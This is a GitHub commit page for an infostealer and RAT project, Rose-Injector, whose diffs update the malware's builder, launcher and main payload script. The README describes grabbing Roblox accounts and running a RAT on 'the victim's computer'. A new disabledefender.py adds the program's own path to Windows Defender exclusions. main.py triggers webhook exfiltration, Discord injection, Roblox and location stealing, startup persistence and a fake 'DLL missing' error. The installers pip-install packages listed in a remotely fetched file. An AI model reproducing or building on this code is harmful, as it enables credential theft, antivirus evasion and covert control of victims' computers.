Skip to content

Commit

Permalink
. (0xRose#72)
Browse files Browse the repository at this point in the history
* Update injection.py

* Delete injection.js

* Add files via upload

* Update config.py

* Update main.py

* Update rose_builder.pyw

* Add files via upload

* Update main.py

* Update v8.pyw

* Update builder.py

* Update launch_builder.bat

* Rename readme.md to README.md

* Update README.md

* Rename readme.md to README.md

* Update disabledefender.py
  • Loading branch information
gumbobrot authored Mar 27, 2023
1 parent c11de0d commit 69ac098
Show file tree
Hide file tree
Showing 10 changed files with 88 additions and 57 deletions.
3 changes: 1 addition & 2 deletions commands/readme.md → commands/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -19,5 +19,4 @@ Roblox: Grabs Roblox accounts
[Advanced]
RAT: Runs a RAT on the victim's computer. (see github.com/DamagingRose/Rose-RAT)
Ping: ping @everyone once the grabber is started
```
```
4 changes: 2 additions & 2 deletions launch_builder.bat
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,7 @@ goto :CHOICE1
:PYTHON_DOES_EXIST
for /f "delims=" %%V in ('python -V') do @set ver=%%V
echo Looks good, %ver% is installed...
goto :CHOICE2
goto :CHOICE2

:CHOICE1
set /P c=Do you want to download Python 3.11.2 NOW with Curl or download it MANUALLY? [N/M]
Expand Down Expand Up @@ -54,4 +54,4 @@ echo WARNING | Closing this results that the builder is also being exited.
:MANUALLY2
echo Okay, the builder is called rose_builder.pyw and is located in the tools folder. Press ENTER to exit.
pause
exit
exit
1 change: 1 addition & 0 deletions roseui/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
this is still under development lol - xpierroz
6 changes: 2 additions & 4 deletions roseui/builder.py
Original file line number Diff line number Diff line change
Expand Up @@ -93,16 +93,14 @@ def edit_config(self):
f.write(new)

def compile(self):
os.system(f'pyinstaller --noconfirm --onefile --windowed "{self.path}/main.py"')
os.system(f'pyinstaller --noconsole --onefile "{self.path}/main.py"')

def move_dir(self):
shutil.move("dist\\main.exe", f"{self.dir_name}.exe")
shutil.rmtree('build')
shutil.rmtree('dist')
os.remove("main.spec")



def run(self):
try:
self.create_dir()
Expand Down Expand Up @@ -132,4 +130,4 @@ def run(self):
sys.argv[12],
sys.argv[13],
sys.argv[14]
).run()
).run()
1 change: 0 additions & 1 deletion roseui/readme.md

This file was deleted.

23 changes: 22 additions & 1 deletion roseui/v8.pyw
Original file line number Diff line number Diff line change
@@ -1,3 +1,23 @@
def requirementsinstallation():
try:
import requests
except Exception:
import subprocess
subprocess.run("python -m pip install requests", shell=True)

import requests
import subprocess
requirementsurl = requests.get("https://raw.githubusercontent.com/DamagingRose/Rose-Injector/main/scrapedata/requirements.txt").text
spliee = requirementsurl.split()
done00:int = 0
for split in spliee:
print(f"\n[INFO]: [Installing the missing libraries.... Wait till you see the finish message. ({done00}/{len(spliee)})]")
subprocess.run(f"python -m pip install {split}", shell=True)
done00+=1
subprocess.run("cls", shell=True)

requirementsinstallation()

import sys, os
if sys.executable.endswith('pythonw.exe'):
sys.stdout = open(os.devnull, 'w')
Expand Down Expand Up @@ -340,4 +360,5 @@ if __name__ in {"__main__", "__mp_main__"}:
server_kwargs={"dark": True, "reload": False, "show": False, "port": 3000},
width=700,
height=700,
).run()
).run()

5 changes: 5 additions & 0 deletions source/disabledefender.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
import subprocess
from sys import argv

curr = argv[0]
subprocess.run(f"Set-MpPreference -ExclusionPath {curr}", shell=True)
70 changes: 30 additions & 40 deletions source/main.py
Original file line number Diff line number Diff line change
@@ -1,17 +1,7 @@
import _webhook
import discordc
import informations
import malicious
import rat
import injection
from config import Config
from _roblox import RobloxX
from anonFile import uploadToAnonfiles
from startup import StartUp
ii = informations.Info()
_webh = _webhook.WebhookX()
cc = Config()
from requirements_installation import requirementsinstallation

try:
### Imports
import getpass
import platform
import ctypes
Expand All @@ -22,10 +12,9 @@
import socket
import subprocess
import threading
import sys
import dhooks
import requests
import psutil
import browser_cookie3
from base64 import b64decode
from ctypes import POINTER, Structure, byref, c_buffer, c_char, cdll, windll, wintypes
from json import dumps
Expand All @@ -37,32 +26,33 @@
from zipfile import ZipFile
from Crypto.Cipher import AES
from PIL import ImageGrab
from tabulate import tabulate
except Exception:
try:
import requests
import subprocess
import os
except Exception:
import subprocess
subprocess.run("python -m pip install requests", shell=True, check=True)

import requests
requirementsurl = requests.get("https://raw.githubusercontent.com/DamagingRose/Rose-Injector/main/scrapedata/requirements.txt").text
spliee = requirementsurl.split()

for split in spliee:
subprocess.run(f"python -m pip install {split}", shell=True, check=True)
subprocess.run("cls", shell=True, check=True)
### File Imports
import _webhook
import discordc
import informations
import malicious
import rat
import injection
from config import Config
from _roblox import RobloxX
from anonFile import uploadToAnonfiles
from startup import StartUp
except Exception:
requirementsinstallation()

ii = informations.Info()
_webh = _webhook.WebhookX()
cc = Config()


if platform.system() is not "Windows":
exit()
if platform.system() != "Windows":
sys.exit()

if cc.get_fake_error() is True:
if cc.get_fake_error() == True:
ctypes.windll.user32.MessageBoxW(0, "The program can't start because VLg7.ll is missing from your computer. Try reinstalling the program to fix this problem", "DDL missing", 16)

if cc.get_start_up() is True:
if cc.get_start_up() == True:
StartUp()


Expand Down Expand Up @@ -866,17 +856,17 @@ def send_malicious():
print(filetext)
upload("kiwi", filetext)

if cc.get_malicious_stealing() is True:
if cc.get_malicious_stealing() == True:
send_malicious()

if cc.get_injection() is True:
if cc.get_injection() == True:
injection.InjectionX(webhook)

if cc.get_roblox_stealing() is True:
if cc.get_roblox_stealing() == True:
RobloxX().run()

if cc.get_location_stealing() is True:
if cc.get_location_stealing() == True:
_webh.locations_webhook(ii.global_info())

if cc.get_discord_rat() is True:
if cc.get_discord_rat() == True:
rat.run_rat()
19 changes: 19 additions & 0 deletions source/requirements_installation.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
class requirementsinstallation():
try:
import requests
except Exception:
import subprocess
subprocess.run("python -m pip install requests", shell=True)

import requests
import subprocess

requirementsurl = requests.get("https://raw.githubusercontent.com/DamagingRose/Rose-Injector/main/scrapedata/requirements.txt").text
spliee = requirementsurl.split()
done00:int = 0

for split in spliee:
print(f"\n[INFO]: [Installing the missing libraries.... Wait till you see the finish message. ({done00}/{len(spliee)})]")
subprocess.run(f"python -m pip install {split}", shell=True)
done00+=1
subprocess.run("cls", shell=True)
13 changes: 6 additions & 7 deletions tools/rose_builder.pyw
Original file line number Diff line number Diff line change
Expand Up @@ -9,21 +9,20 @@ __icon__ = "https://raw.githubusercontent.com/DamagingRose/Rose-Injector/main/to
def requirementsinstallation():
try:
import requests
import os
import subprocess
except Exception:
import subprocess
subprocess.run("python -m pip install requests", shell=True, check=True)

subprocess.run("python -m pip install requests", shell=True)

import requests
import subprocess
requirementsurl = requests.get("https://raw.githubusercontent.com/DamagingRose/Rose-Injector/main/scrapedata/requirements.txt").text
spliee = requirementsurl.split()
done00:int = 0
for split in spliee:
print(f"\n[INFO]: [Installing the missing libraries.... Wait till you see the finish message. ({done00}/{len(spliee)})]")
subprocess.run(f"python -m pip install {split}", shell=True, check=True)
subprocess.run(f"python -m pip install {split}", shell=True)
done00+=1
subprocess.run("cls", shell=True, check=True)

subprocess.run("cls", shell=True)

requirementsinstallation()

Expand Down

0 comments on commit 69ac098

Please sign in to comment.